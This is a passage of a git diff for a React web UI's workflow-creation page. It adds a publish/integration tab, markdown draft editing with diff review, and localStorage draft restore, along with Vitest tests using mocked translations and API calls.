+    const user = userEvent.setup();
+    render(
+      <CreateRightPanel
+        workflow={workflow}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(screen.getByText('Publish content for generated_workflow')).toBeInTheDocument();
+    expect(capturedIntegrationTabProps[capturedIntegrationTabProps.length - 1].onGuidePrompt).toEqual(expect.any(Function));
+  });
+
+  it('routes publish guide prompts back into the current workbench session', async () => {
+    const user = userEvent.setup();
+    const onLaunchRequestHandled = vi.fn();
+    render(
+      <CreateRightPanel
+        workflow={workflow}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+        initialChatSessionId="session-existing"
+        onChatLaunchRequestHandled={onLaunchRequestHandled}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+    await user.click(screen.getByRole('button', { name: '发布为 API' }));
+
+    expect(screen.getByText('Workbench content')).toBeInTheDocument();
+    const latestChatProps = capturedCreateChatTabProps[capturedCreateChatTabProps.length - 1];
+    expect(latestChatProps.initialSessionId).toBe('session-existing');
+    expect(latestChatProps.launchRequest).toMatchObject({
+      prompt: 'publish api prompt',
+      displayLabel: '发布为 API',
+    });
+
+    latestChatProps.onLaunchRequestHandled(latestChatProps.launchRequest.id);
+    expect(onLaunchRequestHandled).toHaveBeenCalledWith(latestChatProps.launchRequest.id);
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx b/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
index 15e5aba5a..71f6bde17 100644
--- a/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
@@ -1,16 +1,24 @@
-import { useState } from 'react';
+import { useEffect, useRef, useState } from 'react';
+import { Rocket } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow } from '@/api/workflow';
-import CreateChatTab from './CreateChatTab';
+import CreateChatTab, { type CreateWorkflowChatLaunchRequest } from './CreateChatTab';
 import CreateOverviewTab from './CreateOverviewTab';
+import IntegrationTab from '../WorkflowDetail/tabs/IntegrationTab';
 
-type TabId = 'chat' | 'overview';
+type TabId = 'chat' | 'overview' | 'integration';
 
 interface CreateRightPanelProps {
   workflow: Workflow | null;
   open: boolean;
   width?: number;
   onWorkflowCreated: (workflow: Workflow) => void;
+  onWorkflowUpdated?: (workflow: Workflow) => void;
+  initialChatSessionId?: string | null;
+  creationStartedAt?: number;
+  onChatSessionChange?: (sessionId: string | null) => void;
+  chatLaunchRequest?: CreateWorkflowChatLaunchRequest | null;
+  onChatLaunchRequestHandled?: (id: number) => void;
 }
 
 export default function CreateRightPanel({
@@ -18,13 +26,46 @@ export default function CreateRightPanel({
   open,
   width = 320,
   onWorkflowCreated,
+  onWorkflowUpdated,
+  initialChatSessionId,
+  creationStartedAt,
+  onChatSessionChange,
+  chatLaunchRequest,
+  onChatLaunchRequestHandled,
 }: CreateRightPanelProps) {
   const { t } = useTranslation('workflow');
   const [activeTab, setActiveTab] = useState<TabId>('chat');
+  const [publishGuideLaunchRequest, setPublishGuideLaunchRequest] = useState<CreateWorkflowChatLaunchRequest | null>(null);
+  const publishGuideLaunchSeqRef = useRef(10_000);
+  const effectiveChatLaunchRequest = chatLaunchRequest ?? publishGuideLaunchRequest;
+
+  useEffect(() => {
+    if (effectiveChatLaunchRequest) {
+      setActiveTab('chat');
+    }
+  }, [effectiveChatLaunchRequest]);
+
+  const handlePublishGuidePrompt = (prompt: string, displayLabel: string) => {
+    publishGuideLaunchSeqRef.current += 1;
+    setPublishGuideLaunchRequest({
+      id: publishGuideLaunchSeqRef.current,
+      prompt,
+      displayLabel,
+    });
+    setActiveTab('chat');
+  };
+
+  const handleChatLaunchRequestHandled = (id: number) => {
+    setPublishGuideLaunchRequest((current) => (
+      current?.id === id ? null : current
+    ));
+    onChatLaunchRequestHandled?.(id);
+  };
 
   const TABS: { id: TabId; label: string }[] = [
     { id: 'overview', label: t('create.rightPanel.tabOverview') },
     { id: 'chat', label: t('create.rightPanel.tabChat') },
+    { id: 'integration', label: t('create.rightPanel.tabIntegration') },
   ];
 
   return (
@@ -52,11 +93,39 @@ export default function CreateRightPanel({
 
       <div className="flex-1 min-h-0 overflow-hidden flex flex-col">
         {activeTab === 'chat' && (
-          <CreateChatTab onWorkflowCreated={onWorkflowCreated} />
+          <CreateChatTab
+            onWorkflowCreated={onWorkflowCreated}
+            initialSessionId={initialChatSessionId}
+            creationStartedAt={creationStartedAt}
+            onSessionChange={onChatSessionChange}
+            launchRequest={effectiveChatLaunchRequest}
+            onLaunchRequestHandled={handleChatLaunchRequestHandled}
+          />
         )}
         {activeTab === 'overview' && (
           <CreateOverviewTab workflow={workflow} />
         )}
+        {activeTab === 'integration' && (
+          workflow ? (
+            <IntegrationTab
+              workflow={workflow}
+              onWorkflowUpdated={onWorkflowUpdated}
+              onGuidePrompt={handlePublishGuidePrompt}
+            />
+          ) : (
+            <div className="flex min-h-0 flex-1 items-center justify-center p-6">
+              <div className="flex max-w-[260px] flex-col items-center gap-3 rounded-xl border border-dashed border-gray-200 bg-gray-50/70 px-5 py-6 text-center">
+                <div className="flex h-10 w-10 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+                  <Rocket className="h-4 w-4" />
+                </div>
+                <div>
+                  <p className="text-sm font-semibold text-gray-800">{t('create.publish.emptyTitle')}</p>
+                  <p className="mt-1 text-xs leading-relaxed text-gray-500">{t('create.publish.emptyHint')}</p>
+                </div>
+              </div>
+            </div>
+          )
+        )}
       </div>
     </div>
   );
diff --git a/webui/src/pages/WorkflowCreate/CreateTopBar.tsx b/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
index a9398aadc..8893e18e1 100644
--- a/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
@@ -2,6 +2,7 @@ import { Link, useNavigate } from 'react-router-dom';
 import { ArrowLeft, ExternalLink, PanelRight, PanelRightClose } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface CreateTopBarProps {
   workflow: Workflow | null;
@@ -10,8 +11,9 @@ interface CreateTopBarProps {
 }
 
 export default function CreateTopBar({ workflow, panelOpen, onTogglePanel }: CreateTopBarProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const navigate = useNavigate();
+  const displayName = workflow ? getWorkflowDisplayName(workflow, i18n?.language) : '';
 
   return (
     <div className="h-14 bg-white border-b border-gray-200 flex items-center px-4 gap-3 flex-shrink-0 z-10">
@@ -27,7 +29,7 @@ export default function CreateTopBar({ workflow, panelOpen, onTogglePanel }: Cre
 
       <div className="flex items-center gap-2 flex-1 min-w-0">
         <h1 className="text-sm font-semibold text-gray-900 truncate">
-          {workflow ? workflow.name : t('create.topBar.newWorkflow')}
+          {workflow ? displayName : t('create.topBar.newWorkflow')}
         </h1>
         {!workflow ? (
           <span className="px-2 py-0.5 rounded-full text-xs font-medium bg-red-50 text-red-600 flex-shrink-0 border border-red-200">
diff --git a/webui/src/pages/WorkflowCreate/index.test.tsx b/webui/src/pages/WorkflowCreate/index.test.tsx
new file mode 100644
index 000000000..0abd49834
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/index.test.tsx
@@ -0,0 +1,344 @@
+import { act, render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import WorkflowCreate from './index';
+
+type TestInitialEntry = string | {
+  pathname: string;
+  search?: string;
+  hash?: string;
+  state?: unknown;
+  key?: string;
+};
+
+const { capturedCreateRightPanelProps, mockWorkflowAPI } = vi.hoisted(() => ({
+  capturedCreateRightPanelProps: [] as any[],
+  mockWorkflowAPI: {
+    get: vi.fn(),
+    update: vi.fn(),
+  },
+}));
+
+vi.mock('../WorkflowDetail/FlowCanvas', () => ({
+  default: () => <div data-testid="flow-canvas">Flow canvas</div>,
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: mockWorkflowAPI,
+}));
+
+vi.mock('./CreateRightPanel', () => ({
+  default: (props: any) => {
+    capturedCreateRightPanelProps.push(props);
+    return <div data-testid="create-right-panel">Create right panel</div>;
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        pageTitle: '工作流',
+        'create.topBar.newWorkflow': '新建工作流',
+        'create.topBar.creating': '创建中',
+        'create.topBar.generated': '已生成',
+        'create.topBar.viewDetail': '查看详情',
+        'create.canvasTitle': '工作流画布',
+        'create.canvasHint': '在右侧工作台中描述您的需求',
+        'detail.canvasTabs.flow': '流程图',
+        'detail.canvasTabs.md': '流程说明',
+        'detail.canvasTabs.json': '工作流文件',
+        'detail.editDocTitle': 'workflow.md',
+        'detail.editDocTextareaLabel': '编辑 workflow.md',
+        'detail.editDocUnsaved': '未保存',
+        'detail.editDocModeEdit': '编辑',
+        'detail.editDocModePreview': '预览',
+        'detail.generateEditDocTitle': '生成说明',
+        'detail.regenerateEditDocTitle': '重置 workflow.md',
+        'detail.regenerateEditDoc': '重置文档',
+        'detail.generateEditDoc': '生成说明',
+        'detail.downloadMdTitle': '下载当前说明文件',
+        'detail.downloadMd': '下载说明文件',
+        'detail.editDocSaving': '保存中',
+        'detail.editDocSave': '保存',
+        'detail.generateWorkflow': '生成工作流',
+        'detail.generateWorkflowTitle': '基于 workflow.md 生成 workflow.json',
+        'detail.generateEditDocPrompt': '用户点击了「生成说明」。基于 {{jsonPath}} 生成 workflow.md。\n{{workflowJson}}',
+        'detail.generateWorkflowPrompt': '用户点击了「生成工作流」按钮。基于 {{mdPath}} 生成 workflow.json。\n{{editDocContent}}',
+        'create.chat.generateEditDocPrompt': '用户点击了「生成说明」。先生成 workflow.md。\n{{editDocContent}}',
+        'create.chat.generateWorkflowPrompt': '用户点击了「生成工作流」按钮。基于当前 workflow.md 生成 workflow.json。\n{{editDocContent}}',
+        'detail.editDocPlaceholder': '编辑 workflow.md',
+        'detail.editDocEmpty': '暂无 workflow.md',
+        'detail.editDocEmptyHint': '生成 workflow.md',
+        'detail.editDocDiffTitle': 'AI 修改差异',
+        'detail.editDocDiffReviewDesc': 'AI 已修改 workflow.md',
+        'detail.editDocDiffAdded': '新增',
+        'detail.editDocDiffRemoved': '删除',
+        'detail.editDocDiffAccept': '接受',
+        'detail.editDocDiffReject': '拒绝',
+        'detail.editDocDiffHunkTitle': '变更 {{index}}',
+        'detail.editDocDiffAcceptHunk': '接受此段',
+        'detail.editDocDiffRejectHunk': '拒绝此段',
+        'detail.editDocDiffRejecting': '回滚中',
+        'detail.editDocDiffEmpty': '没有差异',
+        'detail.dragAdjust': '拖动调整宽度',
+        'detail.topBar.collapsePanel': '收起面板',
+        'detail.topBar.expandPanel': '展开面板',
+      };
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => (
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
+    },
+    i18n: { language: 'zh-CN' },
+  }),
+}));
+
+function renderWorkflowCreate(initialEntries: TestInitialEntry[] = ['/workflows/new']) {
+  return render(
+    <MemoryRouter initialEntries={initialEntries}>
+      <WorkflowCreate />
+    </MemoryRouter>,
+  );
+}
+
+describe('WorkflowCreate page', () => {
+  beforeEach(() => {
+    window.localStorage.clear();
+    vi.clearAllMocks();
+    capturedCreateRightPanelProps.length = 0;
+    mockWorkflowAPI.get.mockRejectedValue(new Error('not restored'));
+    mockWorkflowAPI.update.mockImplementation(async (_id: string, data: Record<string, unknown>) => ({
+      data: {
+        id: _id,
+        name: _id,
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 1,
+        workflowJson: {
+          start: '',
+          nodes: [],
+          edges: [],
+        },
+        markdownContent: data.markdownContent,
+        editMarkdownContent: data.markdownContent,
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      },
+    }));
+  });
+
+  it('starts with the blank workflow.md editor on the left', () => {
+    renderWorkflowCreate();
+
+    expect(screen.getByRole('button', { name: /流程图/ })).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: /流程说明/ }).length).toBeGreaterThan(0);
+    expect(screen.getByRole('button', { name: /工作流文件/ })).toBeInTheDocument();
+    expect(screen.getByRole('textbox', { name: '编辑 workflow.md' })).toHaveValue('');
+    expect(screen.getByTestId('workflow-md-line-numbers')).toHaveTextContent('1');
+    expect(screen.getByTestId('create-right-panel')).toBeInTheDocument();
+  });
+
+  it('launches the workflow.md generation task from the blank editor', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    await user.click(screen.getByRole('button', { name: /生成说明/ }));
+
+    await waitFor(() => {
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成说明');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('先生成 workflow.md');
+    });
+  });
+
+  it('keeps the empty flow canvas available from the flow tab', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    await user.click(screen.getByRole('button', { name: /流程图/ }));
+
+    expect(screen.getByTestId('flow-canvas')).toBeInTheDocument();
+    expect(screen.getByText('工作流画布')).toBeVisible();
+  });
+
+  it('launches workflow.md generation when a workflow exists without markdown', async () => {
+    renderWorkflowCreate();
+
+    act(() => {
+      capturedCreateRightPanelProps[0].onWorkflowCreated({
+        id: 'json_only',
+        name: 'json_only',
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 0,
+        workflowJson: {
+          start: 'echo',
+          nodes: [{ id: 'echo', type: 'python' }],
+          edges: [],
+        },
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      });
+    });
+
+    await waitFor(() => {
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成说明');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('生成 workflow.md');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('"start": "echo"');
+    });
+  });
+
+  it('shows markdown diff review and edit toolbar after a workflow is created', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    act(() => {
+      capturedCreateRightPanelProps[0].onWorkflowCreated({
+        id: 'hello_world',
+        name: 'hello_world',
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 0,
+        markdownContent: '# hello_world\n\n## 业务场景\n',
+        workflowJson: {
+          start: 'echo',
+          nodes: [],
+          edges: [],
+        },
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      });
+    });
+
+    expect(screen.getByRole('button', { name: /编辑/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /预览/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /保存/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /生成工作流/ })).toBeInTheDocument();
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.getByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /^接受$/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /^拒绝$/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /生成工作流/ }));
+
+    await waitFor(() => {
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成工作流');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('workflow.json');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('# hello_world');
+    });
+  });
+
+  it('restores the creation draft after refreshing the create page', async () => {
+    const restoredWorkflow = {
+      id: 'restored_workflow',
+      name: 'restored_workflow',
+      category: 'default',
+      status: 'draft' as const,
+      createdAt: 100,
+      updatedAt: 200,
+      markdownContent: '# server version\n',
+      workflowJson: {
+        start: 'echo',
+        nodes: [],
+        edges: [],
+      },
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    mockWorkflowAPI.get.mockResolvedValue({ data: restoredWorkflow });
+    window.localStorage.setItem('flocks.workflow.create.draft.v1', JSON.stringify({
+      version: 1,
+      workflowId: 'restored_workflow',
+      chatSessionId: 'session-restored',
+      creationStartedAt: 123,
+      panelOpen: true,
+      panelWidth: 360,
+      canvasTab: 'md',
+      workflowMdDraft: '# local draft\n\nunsaved line\n',
+      workflowMdBase: '# local draft\n',
+      workflowMdDiff: {
+        before: '# local draft\n',
+        after: '# local draft\n\nunsaved line\n',
+      },
+      editDocMode: 'edit',
+      updatedAt: 456,
+    }));
+
+    renderWorkflowCreate();
+
+    await waitFor(() => {
+      expect(mockWorkflowAPI.get).toHaveBeenCalledWith('restored_workflow');
+    });
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.getByText('unsaved line')).toBeInTheDocument();
+
+    const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+    expect(latestProps.initialChatSessionId).toBe('session-restored');
+    expect(latestProps.creationStartedAt).toBe(123);
+  });
+
+  it('starts a fresh draft when opened from the create workflow entry', () => {
+    window.localStorage.setItem('flocks.workflow.create.draft.v1', JSON.stringify({
+      version: 1,
+      workflowId: 'stale_workflow',
+      chatSessionId: 'stale-session',
+      creationStartedAt: 123,
+      panelOpen: true,
+      panelWidth: 360,
+      canvasTab: 'md',
+      workflowMdDraft: '# stale workflow\n',
+      workflowMdBase: '# stale workflow\n',
+      editDocMode: 'edit',
+      updatedAt: 456,
+    }));
+
+    renderWorkflowCreate([
+      {
+        pathname: '/workflows/new',
+        state: { freshCreate: true },
+      },
+    ]);
+
+    expect(mockWorkflowAPI.get).not.toHaveBeenCalledWith('stale_workflow');
+    expect(screen.getByRole('textbox', { name: '编辑 workflow.md' })).toHaveValue('');
+    expect(window.localStorage.getItem('flocks.workflow.create.draft.v1')).toBeNull();
+
+    const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+    expect(latestProps.initialChatSessionId).toBeNull();
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/index.tsx b/webui/src/pages/WorkflowCreate/index.tsx
index fe320805d..9587aae7f 100644
--- a/webui/src/pages/WorkflowCreate/index.tsx
+++ b/webui/src/pages/WorkflowCreate/index.tsx
@@ -1,13 +1,37 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
-import { Workflow as WorkflowIcon } from 'lucide-react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
+import { Code2, FileText, GitBranch, Workflow as WorkflowIcon } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
-import { Workflow, WorkflowJSON } from '@/api/workflow';
+import { useLocation, useNavigate } from 'react-router-dom';
+import { workflowAPI, Workflow, WorkflowJSON } from '@/api/workflow';
+import WorkflowDocumentPanel, { type WorkflowDocumentMode } from '@/components/common/WorkflowDocumentPanel';
+import WorkflowMarkdownDiffReview from '@/components/common/WorkflowMarkdownDiffReview';
+import { buildWorkflowMarkdown } from '@/utils/workflowMarkdown';
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+  type TextDiffHunk,
+} from '@/utils/textDiff';
+import { extractErrorMessage } from '@/utils/error';
 import FlowCanvas from '../WorkflowDetail/FlowCanvas';
 import CreateTopBar from './CreateTopBar';
 import CreateRightPanel from './CreateRightPanel';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from '@/components/common/sidePanelSizing';
 
-const PANEL_MIN = 240;
-const PANEL_RATIO = 0.40;
+type CreateCanvasTab = 'flow' | 'md' | 'json';
+
+interface EditDocDiff {
+  before: string;
+  after: string;
+}
+
+const WORKFLOW_REFRESH_MS = 3000;
+const CREATE_DRAFT_STORAGE_KEY = 'flocks.workflow.create.draft.v1';
 
 const EMPTY_WORKFLOW_JSON: WorkflowJSON = {
   start: '',
@@ -15,31 +39,201 @@ const EMPTY_WORKFLOW_JSON: WorkflowJSON = {
   edges: [],
 };
 
-function getInitialPanelWidth() {
-  const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-  const available = window.innerWidth - sidebarWidth;
-  return Math.max(PANEL_MIN, Math.round(available * PANEL_RATIO));
+interface StoredCreateDraft {
+  version: 1;
+  workflowId?: string | null;
+  chatSessionId?: string | null;
+  creationStartedAt?: number;
+  panelOpen?: boolean;
+  panelWidth?: number;
+  canvasTab?: CreateCanvasTab;
+  workflowMdDraft?: string;
+  workflowMdBase?: string;
+  workflowMdDiff?: EditDocDiff | null;
+  editDocMode?: WorkflowDocumentMode;
+  updatedAt?: number;
+}
+
+function readStoredCreateDraft(): StoredCreateDraft | null {
+  try {
+    const raw = window.localStorage.getItem(CREATE_DRAFT_STORAGE_KEY);
+    if (!raw) return null;
+    const parsed = JSON.parse(raw) as Partial<StoredCreateDraft>;
+    if (parsed.version !== 1) return null;
+    return parsed as StoredCreateDraft;
+  } catch {
+    return null;
+  }
+}
+
+function writeStoredCreateDraft(draft: StoredCreateDraft) {
+  try {
+    window.localStorage.setItem(CREATE_DRAFT_STORAGE_KEY, JSON.stringify(draft));
+  } catch {
+    // Best-effort persistence; the creation page can still work in memory.
+  }
+}
+
+function clearStoredCreateDraft() {
+  try {
+    window.localStorage.removeItem(CREATE_DRAFT_STORAGE_KEY);
+  } catch {
+    // Best-effort persistence; the creation page can still work in memory.
+  }
+}
+
+function patchStoredCreateDraft(patch: Partial<StoredCreateDraft>) {
+  const current = readStoredCreateDraft() ?? { version: 1 };
+  writeStoredCreateDraft({
+    ...current,
+    ...patch,
+    version: 1,
+    updatedAt: Date.now(),
+  });
+}
+
+function isFreshCreateState(value: unknown): boolean {
+  return Boolean(
+    value
+    && typeof value === 'object'
+    && (value as { freshCreate?: unknown }).freshCreate === true
+  );
+}
+
+function isValidCanvasTab(value: unknown): value is CreateCanvasTab {
+  return value === 'flow' || value === 'md' || value === 'json';
+}
+
+function getWorkflowMarkdown(workflow: Workflow) {
+  return workflow.markdownContent ?? workflow.editMarkdownContent ?? '';
+}
+
+function hasWorkflowJsonDefinition(workflow: Workflow | null) {
+  if (!workflow) return false;
+  return Boolean(
+    workflow.workflowJson.start
+    || workflow.workflowJson.nodes.length > 0
+    || workflow.workflowJson.edges.length > 0
+  );
 }
 
 export default function WorkflowCreate() {
   const { t } = useTranslation('workflow');
+  const location = useLocation();
+  const navigate = useNavigate();
+  const startFreshCreate = isFreshCreateState(location.state);
+  const initialCreateDraftRef = useRef<StoredCreateDraft | null | undefined>(undefined);
+  if (initialCreateDraftRef.current === undefined) {
+    initialCreateDraftRef.current = startFreshCreate ? null : readStoredCreateDraft();
+  }
+  const initialCreateDraft = initialCreateDraftRef.current;
   const [workflow, setWorkflow] = useState<Workflow | null>(null);
-  const [panelOpen, setPanelOpen] = useState(true);
-  const [panelWidth, setPanelWidth] = useState(getInitialPanelWidth);
+  const [panelOpen, setPanelOpen] = useState(initialCreateDraft?.panelOpen ?? true);
+  const [panelWidth, setPanelWidth] = useState(initialCreateDraft?.panelWidth ?? getInitialSidePanelWidth);
+  const [canvasTab, setCanvasTab] = useState<CreateCanvasTab>(
+    isValidCanvasTab(initialCreateDraft?.canvasTab) ? initialCreateDraft.canvasTab : 'md',
+  );
+  const [workflowMdDraft, setWorkflowMdDraft] = useState(initialCreateDraft?.workflowMdDraft ?? '');
+  const [workflowMdBase, setWorkflowMdBase] = useState(initialCreateDraft?.workflowMdBase ?? '');
+  const [editDocMode, setEditDocMode] = useState<WorkflowDocumentMode>(initialCreateDraft?.editDocMode ?? 'edit');
+  const [workflowMdDiff, setWorkflowMdDiff] = useState<EditDocDiff | null>(initialCreateDraft?.workflowMdDiff ?? null);
+  const [editDocSaving, setEditDocSaving] = useState(false);
+  const [editDocReviewing, setEditDocReviewing] = useState<string | null>(null);
+  const [editDocError, setEditDocError] = useState<string | null>(null);
+  const [chatSessionId, setChatSessionId] = useState<string | null>(initialCreateDraft?.chatSessionId ?? null);
+  const [creationStartedAt] = useState(initialCreateDraft?.creationStartedAt ?? Date.now());
+  const [chatLaunchRequest, setChatLaunchRequest] = useState<{
+    id: number;
+    prompt: string;
+    displayLabel?: string;
+  } | null>(null);
   const dragging = useRef(false);
   const dragStartX = useRef(0);
   const dragStartWidth = useRef(0);
+  const editDocWorkflowIdRef = useRef<string | null>(null);
+  const chatLaunchSeqRef = useRef(0);
+  const missingMarkdownAutoLaunchRef = useRef<string | null>(null);
+  const restoredDraftForWorkflowRef = useRef(Boolean(
+    initialCreateDraft?.workflowId &&
+    (
+      initialCreateDraft.workflowMdDraft ||
+      initialCreateDraft.workflowMdBase ||
+      initialCreateDraft.workflowMdDiff
+    ),
+  ));
+
+  const CANVAS_TABS = [
+    { id: 'flow' as const, label: t('detail.canvasTabs.flow'), icon: <GitBranch className="w-3.5 h-3.5" /> },
+    { id: 'md' as const, label: t('detail.canvasTabs.md'), icon: <FileText className="w-3.5 h-3.5" /> },
+    { id: 'json' as const, label: t('detail.canvasTabs.json'), icon: <Code2 className="w-3.5 h-3.5" /> },
+  ];
+
+  useEffect(() => {
+    if (!startFreshCreate) return;
+    clearStoredCreateDraft();
+    navigate('/workflows/new', { replace: true, state: null });
+  }, [navigate, startFreshCreate]);
 
   useEffect(() => {
     const onResize = () => {
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const maxAllowed = Math.round((window.innerWidth - sidebarWidth) * 0.7);
-      setPanelWidth((w) => Math.min(w, Math.max(PANEL_MIN, maxAllowed)));
+      setPanelWidth((w) => Math.min(w, getMaxSidePanelWidth()));
     };
     window.addEventListener('resize', onResize);
     return () => window.removeEventListener('resize', onResize);
   }, []);
 
+  useEffect(() => {
+    if (!initialCreateDraft?.workflowId) return;
+    let cancelled = false;
+    void workflowAPI.get(initialCreateDraft.workflowId)
+      .then((response) => {
+        if (cancelled) return;
+        setWorkflow(response.data);
+      })
+      .catch(() => {
+        patchStoredCreateDraft({ workflowId: null });
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, [initialCreateDraft?.workflowId]);
+
+  useEffect(() => {
+    const hasDraftState = Boolean(
+      workflow ||
+      chatSessionId ||
+      workflowMdDraft ||
+      workflowMdBase ||
+      workflowMdDiff,
+    );
+    if (!hasDraftState) return;
+    writeStoredCreateDraft({
+      version: 1,
+      workflowId: workflow?.id ?? null,
+      chatSessionId,
+      creationStartedAt,
+      panelOpen,
+      panelWidth,
+      canvasTab,
+      workflowMdDraft,
+      workflowMdBase,
+      workflowMdDiff,
+      editDocMode,
+      updatedAt: Date.now(),
+    });
+  }, [
+    canvasTab,
+    chatSessionId,
+    creationStartedAt,
+    editDocMode,
+    panelOpen,
+    panelWidth,
+    workflow,
+    workflowMdBase,
+    workflowMdDiff,
+    workflowMdDraft,
+  ]);
+
   const onDragStart = useCallback(
     (e: React.MouseEvent) => {
       e.preventDefault();
@@ -47,13 +241,12 @@ export default function WorkflowCreate() {
       dragStartX.current = e.clientX;
       dragStartWidth.current = panelWidth;
 
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const panelMax = Math.round((window.innerWidth - sidebarWidth) * 0.7);
+      const panelMax = getMaxSidePanelWidth();
 
       const onMove = (ev: MouseEvent) => {
         if (!dragging.current) return;
         const delta = dragStartX.current - ev.clientX;
-        setPanelWidth(Math.min(panelMax, Math.max(PANEL_MIN, dragStartWidth.current + delta)));
+        setPanelWidth(Math.min(panelMax, Math.max(SIDE_PANEL_MIN_WIDTH, dragStartWidth.current + delta)));
       };
       const onUp = () => {
         dragging.current = false;
@@ -70,6 +263,284 @@ export default function WorkflowCreate() {
     setWorkflow(newWorkflow);
   }, []);
 
+  const handleWorkflowUpdated = useCallback((updatedWorkflow: Workflow) => {
+    setWorkflow(updatedWorkflow);
+  }, []);
+
+  useEffect(() => {
+    if (!workflow) return;
+    let disposed = false;
+    const timer = window.setInterval(async () => {
+      try {
+        const response = await workflowAPI.get(workflow.id);
+        if (!disposed) {
+          setWorkflow(response.data);
+        }
+      } catch {
+        // The workflow may still be settling on disk; the next poll can recover.
+      }
+    }, WORKFLOW_REFRESH_MS);
+    return () => {
+      disposed = true;
+      window.clearInterval(timer);
+    };
+  }, [workflow?.id]);
+
+  useEffect(() => {
+    if (!workflow) {
+      editDocWorkflowIdRef.current = null;
+      return;
+    }
+
+    const next = getWorkflowMarkdown(workflow);
+    const workflowIdChanged = workflow.id !== editDocWorkflowIdRef.current;
+    editDocWorkflowIdRef.current = workflow.id;
+
+    if (workflowIdChanged) {
+      if (restoredDraftForWorkflowRef.current && workflow.id === initialCreateDraft?.workflowId) {
+        restoredDraftForWorkflowRef.current = false;
+        const restoredDraft = initialCreateDraft.workflowMdDraft ?? next;
+        const restoredBase = initialCreateDraft.workflowMdBase ?? next;
+        setWorkflowMdDraft(restoredDraft);
+        setWorkflowMdBase(restoredBase);
